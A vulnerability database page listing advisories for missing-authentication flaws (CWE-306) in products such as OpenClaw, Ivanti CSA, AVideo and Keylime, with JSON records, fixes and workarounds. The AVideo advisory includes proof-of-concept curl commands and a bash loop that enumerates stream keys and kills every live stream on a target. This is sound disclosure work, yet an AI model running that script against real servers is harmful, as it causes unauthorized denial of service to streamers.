Common Weakness Enumeration

CWE-306

Allowed

Missing Authentication for Critical Function

Abstraction: Base · Status: Draft

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

3465 vulnerabilities reference this CWE, most recent first.

GHSA-4HG8-92X6-H2F3

Vulnerability from github – Published: 2026-02-17 21:40 – Updated: 2026-02-20 16:44
VLAI
Summary
OpenClaw is Missing Webhook Authentication in Telnyx Provider Allows Unauthenticated Requests
Details

Summary

In affected versions, OpenClaw's optional @openclaw/voice-call plugin Telnyx webhook handler could accept unsigned inbound webhook requests when telnyx.publicKey was not configured, allowing unauthenticated callers to forge Telnyx events.

This only impacts deployments where the Voice Call plugin is installed, enabled, and the webhook endpoint is reachable from the attacker (for example, publicly exposed via a tunnel/proxy).

Affected Packages / Versions

  • Package: openclaw (npm)
  • Affected: <= 2026.2.13
  • Fixed: >= 2026.2.14 (planned)

Details

Telnyx webhooks are expected to be authenticated via Ed25519 signature verification.

In affected versions, TelnyxProvider.verifyWebhook() could effectively fail open when no Telnyx public key was configured, allowing arbitrary HTTP POST requests to the voice-call webhook endpoint to be treated as legitimate Telnyx events.

Fix

The fix makes Telnyx webhook verification fail closed by default and requires telnyx.publicKey (or TELNYX_PUBLIC_KEY) to be configured.

A signature verification bypass exists only for local development via skipSignatureVerification: true, which is off by default, emits a loud startup warning, and should not be used in production.

This requirement is documented in the Voice Call plugin docs.

Fix Commit(s)

  • 29b587e73cbdc941caec573facd16e87d52f007b
  • f47584fec (centralized verification helper + stronger tests)

Workarounds

  • Configure plugins.entries.voice-call.config.telnyx.publicKey (or TELNYX_PUBLIC_KEY) to enable signature verification.
  • Only for local development: set skipSignatureVerification: true.

Thanks @p80n-sec for reporting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26319"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T21:40:46Z",
    "nvd_published_at": "2026-02-19T23:16:24Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nIn affected versions, OpenClaw\u0027s optional `@openclaw/voice-call` plugin Telnyx webhook handler could accept unsigned inbound webhook requests when `telnyx.publicKey` was not configured, allowing unauthenticated callers to forge Telnyx events.\n\nThis only impacts deployments where the Voice Call plugin is installed, enabled, and the webhook endpoint is reachable from the attacker (for example, publicly exposed via a tunnel/proxy).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `\u003c= 2026.2.13`\n- Fixed: `\u003e= 2026.2.14` (planned)\n\n## Details\n\nTelnyx webhooks are expected to be authenticated via Ed25519 signature verification.\n\nIn affected versions, `TelnyxProvider.verifyWebhook()` could effectively fail open when no Telnyx public key was configured, allowing arbitrary HTTP POST requests to the voice-call webhook endpoint to be treated as legitimate Telnyx events.\n\n## Fix\n\nThe fix makes Telnyx webhook verification fail closed by default and requires `telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to be configured.\n\nA signature verification bypass exists only for local development via `skipSignatureVerification: true`, which is off by default, emits a loud startup warning, and should not be used in production.\n\nThis requirement is documented in the Voice Call plugin docs.\n\n## Fix Commit(s)\n\n- `29b587e73cbdc941caec573facd16e87d52f007b`\n- `f47584fec` (centralized verification helper + stronger tests)\n\n## Workarounds\n\n- Configure `plugins.entries.voice-call.config.telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to enable signature verification.\n- Only for local development: set `skipSignatureVerification: true`.\n\nThanks @p80n-sec for reporting.",
  "id": "GHSA-4hg8-92x6-h2f3",
  "modified": "2026-02-20T16:44:19Z",
  "published": "2026-02-17T21:40:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/f47584fec86d6d73f2d483043a2ad0e7e3c50411"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenClaw is Missing Webhook Authentication in Telnyx Provider Allows Unauthenticated Requests"
}

GHSA-4HHJ-CVFF-6MW4

Vulnerability from github – Published: 2022-05-24 17:07 – Updated: 2024-04-04 02:47
VLAI
Details

The Web Management of TP-Link TP-SG105E V4 1.0.0 Build 20181120 devices allows an unauthenticated attacker to reboot the device via a reboot.cgi request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-16893"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-02-03T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "The Web Management of TP-Link TP-SG105E V4 1.0.0 Build 20181120 devices allows an unauthenticated attacker to reboot the device via a reboot.cgi request.",
  "id": "GHSA-4hhj-cvff-6mw4",
  "modified": "2024-04-04T02:47:22Z",
  "published": "2022-05-24T17:07:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16893"
    },
    {
      "type": "WEB",
      "url": "https://exploit-db.com/exploits/47958"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4HM5-JMP9-7G72

Vulnerability from github – Published: 2026-01-27 12:31 – Updated: 2026-01-27 12:31
VLAI
Details

Pix-Link LV-WR21Q does not enforce any form of authentication for endpoint /goform/getHomePageInfo. Remote unauthenticated attacker is able to use this endpoint to e.g: retrieve cleartext password to the access point.

The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version V108_108 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12386"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-27T12:15:56Z",
    "severity": "MODERATE"
  },
  "details": "Pix-Link LV-WR21Q does not enforce any form of authentication for endpoint\u00a0/goform/getHomePageInfo. Remote unauthenticated attacker is able to use this endpoint to e.g: retrieve cleartext password to the access point.\n\nThe vendor was notified early about this vulnerability, but didn\u0027t respond with the details of vulnerability or vulnerable version range. Only version V108_108 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.",
  "id": "GHSA-4hm5-jmp9-7g72",
  "modified": "2026-01-27T12:31:18Z",
  "published": "2026-01-27T12:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12386"
    },
    {
      "type": "WEB",
      "url": "https://cert.pl/en/posts/2026/01/CVE-2025-12386"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wcyb/security_research"
    },
    {
      "type": "WEB",
      "url": "https://www.pix-link.com/lv-wr21q"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4HP8-84P4-HH6M

Vulnerability from github – Published: 2022-05-24 16:56 – Updated: 2023-02-03 18:30
VLAI
Details

In BIG-IQ 6.0.0-6.1.0, services for stats do not require authentication nor do they implement any form of Transport Layer Security (TLS).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-6652"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-09-25T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In BIG-IQ 6.0.0-6.1.0, services for stats do not require authentication nor do they implement any form of Transport Layer Security (TLS).",
  "id": "GHSA-4hp8-84p4-hh6m",
  "modified": "2023-02-03T18:30:25Z",
  "published": "2022-05-24T16:56:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6652"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K23101430"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K23101430?utm_source=f5support\u0026amp;utm_medium=RSS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4HPG-VXH4-JM69

Vulnerability from github – Published: 2024-12-10 21:30 – Updated: 2024-12-10 21:30
VLAI
Details

An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-11639"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-10T19:15:19Z",
    "severity": "CRITICAL"
  },
  "details": "An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access",
  "id": "GHSA-4hpg-vxh4-jm69",
  "modified": "2024-12-10T21:30:52Z",
  "published": "2024-12-10T21:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11639"
    },
    {
      "type": "WEB",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4HW9-GJ93-W3GR

Vulnerability from github – Published: 2022-12-21 18:30 – Updated: 2022-12-21 18:30
VLAI
Details

Password recovery vulnerability in SICK SIM2000ST Partnumber 2086502 with firmware version <1.13.4 allows an unprivileged remote attacker to gain access to the userlevel defined as RecoverableUserLevel by invocating the password recovery mechanism method. This leads to an increase in their privileges on the system and thereby affecting the confidentiality integrity and availability of the system. An attacker can expect repeatable success by exploiting the vulnerability. The recommended solution is to update the firmware to a version >= 1.13.4 as soon as possible (available in SICK Support Portal).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-47377"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-16T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Password recovery vulnerability in SICK SIM2000ST Partnumber 2086502 with firmware version \u003c1.13.4 allows an unprivileged remote attacker to gain access to the userlevel defined as RecoverableUserLevel by invocating the password recovery mechanism method. This leads to an increase in their privileges on the system and thereby affecting the confidentiality integrity and availability of the system. An attacker can expect repeatable success by exploiting the vulnerability. The recommended solution is to update the firmware to a version \u003e= 1.13.4 as soon as possible (available in SICK Support Portal).",
  "id": "GHSA-4hw9-gj93-w3gr",
  "modified": "2022-12-21T18:30:24Z",
  "published": "2022-12-21T18:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47377"
    },
    {
      "type": "WEB",
      "url": "https://sick.com/psirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4J8V-2QMR-6M8P

Vulnerability from github – Published: 2022-06-24 00:00 – Updated: 2022-06-30 00:00
VLAI
Details

There is no account authentication and permission check logic in the firmware and existing apps of SiHAS's SGW-300, ACM-300, GCM-300, so unauthorized users can remotely control the device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-26637"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-23T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "There is no account authentication and permission check logic in the firmware and existing apps of SiHAS\u0027s SGW-300, ACM-300, GCM-300, so unauthorized users can remotely control the device.",
  "id": "GHSA-4j8v-2qmr-6m8p",
  "modified": "2022-06-30T00:00:35Z",
  "published": "2022-06-24T00:00:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26637"
    },
    {
      "type": "WEB",
      "url": "https://www.krcert.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=66782"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4JCG-JXPF-5VQ3

Vulnerability from github – Published: 2026-04-01 21:04 – Updated: 2026-04-01 21:04
VLAI
Summary
AVideo: Unauthenticated Live Stream Termination via RTMP Callback on_publish_done.php
Details

Summary

The AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so.

An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform.

Details

The file plugin/Live/on_publish_done.php processes RTMP server callbacks when a stream ends. It accepts a POST parameter name (the stream key) and directly uses it to look up and terminate the corresponding stream session.

// plugin/Live/on_publish_done.php
$row = LiveTransmitionHistory::getLatest($_POST['name'], $live_servers_id, 10);
$insert_row = LiveTransmitionHistory::finishFromTransmitionHistoryId($row['id']);

There is no authentication check anywhere in the file - no User::isLogged(), no User::isAdmin(), no token validation. The endpoint is designed to be called by the RTMP server (e.g., Nginx-RTMP), but since it is a standard HTTP endpoint, any external client can call it directly.

Additionally, stream keys can be harvested from the unauthenticated stats.json.php endpoint, which returns information about active streams including their keys.

Proof of Concept

  1. Retrieve active stream keys from the unauthenticated stats endpoint:
curl -s "https://your-avideo-instance.com/plugin/Live/stats.json.php" | python3 -m json.tool
  1. Terminate a live stream by sending a POST request with the stream key:
curl -X POST "https://your-avideo-instance.com/plugin/Live/on_publish_done.php" \
  -d "name=STREAM_KEY_HERE"
  1. The server responds with HTTP 200 and the stream is marked as finished in the live_transmitions_history table. The streamer's broadcast is terminated.

  2. To disrupt all active streams, iterate over keys returned from step 1:

#!/bin/bash
# Terminate all active streams on a target AVideo instance
TARGET="https://your-avideo-instance.com"

curl -s "$TARGET/plugin/Live/stats.json.php" \
  | python3 -c "
import sys, json
data = json.load(sys.stdin)
for stream in data.get('applications', []):
    for client in stream.get('live', {}).get('streams', []):
        print(client.get('name', ''))
" | while read -r key; do
  [ -z "$key" ] && continue
  echo "[*] Terminating stream: $key"
  curl -s -X POST "$TARGET/plugin/Live/on_publish_done.php" -d "name=$key"
done

Impact

Any unauthenticated attacker can terminate live broadcasts on an AVideo instance. This constitutes a denial-of-service vulnerability against the live streaming functionality. Combined with the unauthenticated stream key enumeration from stats.json.php, an attacker can systematically disrupt all active streams on the platform.

  • CWE-306: Missing Authentication for Critical Function
  • Severity: Medium

Recommended Fix

Restrict the RTMP callback endpoint to localhost connections only at plugin/Live/on_publish_done.php:3:

// plugin/Live/on_publish_done.php:3
if (!in_array($_SERVER['REMOTE_ADDR'], ['127.0.0.1', '::1'])) {
    http_response_code(403);
    die('Forbidden');
}

Since this endpoint is designed to be called by the local RTMP server (e.g., Nginx-RTMP), it should only accept requests from localhost. External clients should never be able to invoke it directly.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34731"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:04:09Z",
    "nvd_published_at": "2026-03-31T21:16:31Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe AVideo `on_publish_done.php` endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so.\n\nAn attacker can enumerate active stream keys from the unauthenticated `stats.json.php` endpoint, then send crafted POST requests to `on_publish_done.php` to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform.\n\n## Details\n\nThe file `plugin/Live/on_publish_done.php` processes RTMP server callbacks when a stream ends. It accepts a POST parameter `name` (the stream key) and directly uses it to look up and terminate the corresponding stream session.\n\n```php\n// plugin/Live/on_publish_done.php\n$row = LiveTransmitionHistory::getLatest($_POST[\u0027name\u0027], $live_servers_id, 10);\n$insert_row = LiveTransmitionHistory::finishFromTransmitionHistoryId($row[\u0027id\u0027]);\n```\n\nThere is no authentication check anywhere in the file - no `User::isLogged()`, no `User::isAdmin()`, no token validation. The endpoint is designed to be called by the RTMP server (e.g., Nginx-RTMP), but since it is a standard HTTP endpoint, any external client can call it directly.\n\nAdditionally, stream keys can be harvested from the unauthenticated `stats.json.php` endpoint, which returns information about active streams including their keys.\n\n## Proof of Concept\n\n1. Retrieve active stream keys from the unauthenticated stats endpoint:\n\n```bash\ncurl -s \"https://your-avideo-instance.com/plugin/Live/stats.json.php\" | python3 -m json.tool\n```\n\n2. Terminate a live stream by sending a POST request with the stream key:\n\n```bash\ncurl -X POST \"https://your-avideo-instance.com/plugin/Live/on_publish_done.php\" \\\n  -d \"name=STREAM_KEY_HERE\"\n```\n\n3. The server responds with HTTP 200 and the stream is marked as finished in the `live_transmitions_history` table. The streamer\u0027s broadcast is terminated.\n\n4. To disrupt all active streams, iterate over keys returned from step 1:\n\n```bash\n#!/bin/bash\n# Terminate all active streams on a target AVideo instance\nTARGET=\"https://your-avideo-instance.com\"\n\ncurl -s \"$TARGET/plugin/Live/stats.json.php\" \\\n  | python3 -c \"\nimport sys, json\ndata = json.load(sys.stdin)\nfor stream in data.get(\u0027applications\u0027, []):\n    for client in stream.get(\u0027live\u0027, {}).get(\u0027streams\u0027, []):\n        print(client.get(\u0027name\u0027, \u0027\u0027))\n\" | while read -r key; do\n  [ -z \"$key\" ] \u0026\u0026 continue\n  echo \"[*] Terminating stream: $key\"\n  curl -s -X POST \"$TARGET/plugin/Live/on_publish_done.php\" -d \"name=$key\"\ndone\n```\n\n## Impact\n\nAny unauthenticated attacker can terminate live broadcasts on an AVideo instance. This constitutes a denial-of-service vulnerability against the live streaming functionality. Combined with the unauthenticated stream key enumeration from `stats.json.php`, an attacker can systematically disrupt all active streams on the platform.\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **Severity**: Medium\n\n## Recommended Fix\n\nRestrict the RTMP callback endpoint to localhost connections only at `plugin/Live/on_publish_done.php:3`:\n\n```php\n// plugin/Live/on_publish_done.php:3\nif (!in_array($_SERVER[\u0027REMOTE_ADDR\u0027], [\u0027127.0.0.1\u0027, \u0027::1\u0027])) {\n    http_response_code(403);\n    die(\u0027Forbidden\u0027);\n}\n```\n\nSince this endpoint is designed to be called by the local RTMP server (e.g., Nginx-RTMP), it should only accept requests from localhost. External clients should never be able to invoke it directly.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-4jcg-jxpf-5vq3",
  "modified": "2026-04-01T21:04:09Z",
  "published": "2026-04-01T21:04:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-4jcg-jxpf-5vq3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34731"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/e0b9e71f6f3b34f12ad78c1a69d4e1f584b49673"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated Live Stream Termination via RTMP Callback on_publish_done.php"
}

GHSA-4JFM-V5M9-V6GX

Vulnerability from github – Published: 2025-11-27 00:30 – Updated: 2025-11-27 00:30
VLAI
Details

Astak CM-818T3 2.4GHz wireless security surveillance cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint permits remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup may include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that could facilitate further compromise of the camera or connected network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-36873"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-26T23:15:47Z",
    "severity": "HIGH"
  },
  "details": "Astak CM-818T3 2.4GHz wireless security surveillance cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint permits remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup may include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that could facilitate further compromise of the camera or connected network.",
  "id": "GHSA-4jfm-v5m9-v6gx",
  "modified": "2025-11-27T00:30:27Z",
  "published": "2025-11-27T00:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36873"
    },
    {
      "type": "WEB",
      "url": "https://packetstorm.news/files/id/156532"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/astak-cm818t3-unauthenticated-config-disclosure"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4JQP-9QJV-57M2

Vulnerability from github – Published: 2026-02-06 22:34 – Updated: 2026-06-06 00:37
VLAI
Summary
Keylime Missing Authentication for Critical Function and Improper Authentication
Details

Impact

The Keylime registrar does not enforce mutual TLS (mTLS) client certificate authentication since version 7.12.0. The registrar's TLS context is configured with ssl.CERT_OPTIONAL instead of ssl.CERT_REQUIRED, allowing any client to connect to protected API endpoints without presenting a valid client certificate.

Who is impacted: - All Keylime deployments running versions 7.12.0 through 7.13.0 - Environments where the registrar HTTPS port (default 8891) is network-accessible to untrusted clients

What an attacker can do: - List all registered agents (GET /v2/agents/) - enumerate the entire agent inventory - Retrieve agent details (GET /v2/agents/{uuid}) - obtain public TPM keys, certificates, and network locations (IP/port) of any agent - Delete any agent (DELETE /v2/agents/{uuid}) - remove agents from the registry, disrupting attestation services

Note: The exposed TPM data (EK, AK, certificates) consists of public keys and certificates. Private keys remain protected within TPM hardware. The HMAC secret used for challenge-response validation is stored in the database but is not exposed via the API.

Affected versions: >= 7.12.0, <= 7.13.0

Fixed versions: 7.12.2, >= 7.13.1

Patches

A patch for the affected released versions is available. It removes the line that override the configuration of ssl.verify_mode, leaving the CERT_REQUIRED value set by web_util.init_mtls():

diff --git a/keylime/web/base/server.py b/keylime/web/base/server.py
index 1d9a9c2..859b23a 100644
--- a/keylime/web/base/server.py
+++ b/keylime/web/base/server.py
@@ -2,7 +2,6 @@ import asyncio
 import multiprocessing
 from abc import ABC, abstractmethod
 from functools import wraps
-from ssl import CERT_OPTIONAL
 from typing import TYPE_CHECKING, Any, Callable, Optional

 import tornado
@@ -252,7 +251,6 @@ class Server(ABC):
         self._https_port = config.getint(component, "tls_port", fallback=0)
         self._max_upload_size = config.getint(component, "max_upload_size", fallback=104857600)
         self._ssl_ctx = web_util.init_mtls(component)
-        self._ssl_ctx.verify_mode = CERT_OPTIONAL

     def _get(self, pattern: str, controller: type["Controller"], action: str, allow_insecure: bool = False) -> None:
         """Creates a new route to handle incoming GET requests issued for paths which match the given

Users should upgrade to the patched version once it is released.

Workarounds

If upgrading is not immediately possible, apply one of the following mitigations:

1. Network isolation (Recommended)

Restrict access to the registrar HTTPS port (default 8891) using firewall rules to allow only trusted hosts (verifier, tenant):

Example using iptables
iptables -A INPUT -p tcp --dport 8891 -s <verifier_ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 8891 -s <tenant_ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 8891 -j DROP

2. Reverse proxy with mTLS enforcement

Deploy a reverse proxy (nginx, HAProxy) in front of the registrar that enforces client certificate authentication:

Example nginx configuration
server {
    listen 8891 ssl;
    ssl_certificate /path/to/server.crt;
    ssl_certificate_key /path/to/server.key;
    ssl_client_certificate /path/to/ca.crt;
    ssl_verify_client on;  # Enforce client certificates

    location / {
        proxy_pass https://localhost:8892;  # Internal registrar port
    }
}
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keylime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.12.0"
            },
            {
              "fixed": "7.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keylime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.13.0"
            },
            {
              "fixed": "7.13.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "7.13.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1709"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-295",
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-06T22:34:44Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nThe Keylime registrar does not enforce mutual TLS (mTLS) client certificate authentication since version 7.12.0. The registrar\u0027s TLS context is configured with `ssl.CERT_OPTIONAL` instead of `ssl.CERT_REQUIRED`, allowing any client to connect to protected API endpoints without presenting a valid client certificate.\n\n**Who is impacted:**\n  - All Keylime deployments running versions 7.12.0 through 7.13.0\n  - Environments where the registrar HTTPS port (default 8891) is network-accessible to untrusted clients\n\n**What an attacker can do:**\n  - **List all registered agents** (`GET /v2/agents/`) - enumerate the entire agent inventory\n  - **Retrieve agent details** (`GET /v2/agents/{uuid}`) - obtain public TPM keys, certificates, and network locations (IP/port) of any agent\n  - **Delete any agent** (`DELETE /v2/agents/{uuid}`) - remove agents from the registry, disrupting attestation services\n\nNote: The exposed TPM data (EK, AK, certificates) consists of public keys and certificates. Private keys remain protected within TPM hardware. The HMAC secret used for challenge-response validation is stored in the database but is not exposed via the API.\n\n**Affected versions:** \u003e= 7.12.0, \u003c= 7.13.0\n\n**Fixed versions:** 7.12.2, \u003e= 7.13.1\n\n### Patches\n\nA patch for the affected released versions is available. It removes the line that override the configuration of `ssl.verify_mode`, leaving the `CERT_REQUIRED` value set by `web_util.init_mtls()`:\n\n```diff\ndiff --git a/keylime/web/base/server.py b/keylime/web/base/server.py\nindex 1d9a9c2..859b23a 100644\n--- a/keylime/web/base/server.py\n+++ b/keylime/web/base/server.py\n@@ -2,7 +2,6 @@ import asyncio\n import multiprocessing\n from abc import ABC, abstractmethod\n from functools import wraps\n-from ssl import CERT_OPTIONAL\n from typing import TYPE_CHECKING, Any, Callable, Optional\n\n import tornado\n@@ -252,7 +251,6 @@ class Server(ABC):\n         self._https_port = config.getint(component, \"tls_port\", fallback=0)\n         self._max_upload_size = config.getint(component, \"max_upload_size\", fallback=104857600)\n         self._ssl_ctx = web_util.init_mtls(component)\n-        self._ssl_ctx.verify_mode = CERT_OPTIONAL\n\n     def _get(self, pattern: str, controller: type[\"Controller\"], action: str, allow_insecure: bool = False) -\u003e None:\n         \"\"\"Creates a new route to handle incoming GET requests issued for paths which match the given\n```\n\nUsers should upgrade to the patched version once it is released.\n\n### Workarounds\n\nIf upgrading is not immediately possible, apply one of the following mitigations:\n\n#### 1. Network isolation (Recommended)\n\nRestrict access to the registrar HTTPS port (default 8891) using firewall rules\nto allow only trusted hosts (verifier, tenant):\n\n##### Example using iptables\n```\niptables -A INPUT -p tcp --dport 8891 -s \u003cverifier_ip\u003e -j ACCEPT\niptables -A INPUT -p tcp --dport 8891 -s 